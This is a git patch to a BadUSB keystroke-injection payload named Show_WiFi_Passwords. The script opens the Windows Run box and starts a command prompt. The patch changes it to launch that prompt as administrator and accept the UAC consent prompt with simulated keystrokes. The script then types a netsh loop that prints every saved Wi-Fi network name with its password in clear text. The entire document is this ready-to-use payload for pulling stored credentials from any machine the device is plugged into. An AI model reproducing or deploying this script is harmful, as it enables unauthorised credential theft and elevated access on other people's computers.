From 64279a99bca0990726429ebc96cae7c42ca9d093 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Mon, 20 Jun 2022 22:17:05 -0700 Subject: [PATCH] Update Show_WiFi_Passwords.txt --- BadUSB/Show_WiFi_Passwords.txt | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/BadUSB/Show_WiFi_Passwords.txt b/BadUSB/Show_WiFi_Passwords.txt index 1c8a5a6a..ba84b8de 100644 --- a/BadUSB/Show_WiFi_Passwords.txt +++ b/BadUSB/Show_WiFi_Passwords.txt @@ -2,7 +2,10 @@ DELAY 3000 GUI r DELAY 1000 STRING cmd -ENTER -DELAY 2000 +DELAY 500 +CTRL-SHIFT ENTER +DELAY 1000 +ALT Y +DELAY 1000 STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content" ENTER